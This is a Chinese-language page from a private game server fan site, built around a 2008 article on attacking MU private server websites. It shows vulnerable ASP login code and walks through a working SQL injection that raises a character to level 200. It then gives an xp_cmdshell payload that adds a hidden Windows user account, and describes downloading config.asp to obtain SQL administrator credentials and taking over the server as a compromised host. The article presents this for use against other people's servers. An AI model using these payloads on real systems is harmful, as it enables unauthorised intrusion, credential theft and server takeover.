传奇私服 游戏发布 游戏家族 发布家族 私服小偷 私服排行
最新新闻 工具下载 站内公告 在线留言 在线投稿 汇款方式
私服技术 游戏视频 精彩图片 网络电台 网络电视 广告联系
  私服高级搜索 请输入搜索关键词: 文章高级搜索
   最新文章
· 入侵奇迹私服网页漏洞
   相关内容
奇迹法师分身之绝学 (9月21日)
风登录器武器的速度限制的原理和破解办法 (9月4日)
奇迹MU古代竞技场2去法 (9月4日)
奇迹私服战士加点和各职业加敏的数据 (9月4日)
奇迹私服刷钱大法 (9月4日)
奇迹私服漏洞大全一 (9月4日)
入侵奇迹私服网页漏洞 (9月4日)
冲+9戒指和项链的方法 (9月4日)
自定义法师守护公式 (9月4日)
  9 7 1 8 :  第1/1页 共9条记录 每页30
   传奇私服|新开传奇私服|110wf.com私服技术奇迹私服技术
入侵奇迹私服网页漏洞
发布时间: 2008年9月4日 人气: 出处 | 作者: / admin 责任编辑: container
支持本站发展,立即购买会员装备 | 在线投稿 | 游戏玩家社区      

在******.asp中,没有对userchr进行过滤,导致SQL注入.. 不给你文件名!自己找吧!

<!--#include file="conn.asp" -->
<!--#include file="top.asp" -->
<%
n=request.form("username")
p=request.form("userchr")

if instr(n,"\'")<>0 then response.end
if instr(n,"=")<>0 then response.end
if instr(n,"%")<>0 then response.end

if n<>"" and p<>"" then
set rs1 = Server.CreateObject("ADODB.Recordset")
sql="select * from Character where AccountID=\'"&n&"\' and Name=\'"&p&"\' and pklevel<>3"
rs1.open sql,conn,1,3

只对username进行了过滤,不够严密饿.:)

下面把clearpk.asp 另存为本地htm文件,然后把action="clearPK.asp"改为action="http://服务器/clearpk.asp,,把表单项里的maxlength去掉..OK..
在角色名称里输入: XX\';update character set clevel=200 where accountID=\'YOUID\';--
在用户名里输入:haha
好了,你的人物已经200级了饿..

如过管理员未对xp_cmdshell存储过程进行限止,那么你还可以把上面的语句换为:
XX\';exec master..xp_cmdshell \'net user hu_ti$ 123 /add\';--
加了一个用户饿..

测试发现,大部分的管理员都是进行远程管理..(FTP管理),
所以你在得到了一个合法用户以后可以ftp XXXX(服务器IP)->登陆->get config.asp;
config.asp记录了SQL管理员的用户名和密码.
最后下载个SQL远程执行系统命令的程序。。
然后呢,一台肉鸡诞生了...哈哈

欢迎转载或摘录奇迹私服技术文章,请注明www.110wf.com
 
评论人 评论内容 ( 查看全部评论 ) 发表时间
评 论:
最多255字。
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
  • 网友评论只代表其个人观点,与本站无关
笔 名:
广告服务 | 联系我们 | 设为首页 | 收藏本站
 
2005 - 2010(c) 传奇私服 www.110wf.Com 版权所有
本站中文版权所有 传奇私服 保留所有权利 未经许可请勿任意转载或复制使用
最佳视觉效果,请使用1024*768分辨率浏览本站 新开传奇私服
粤ICP备08116054号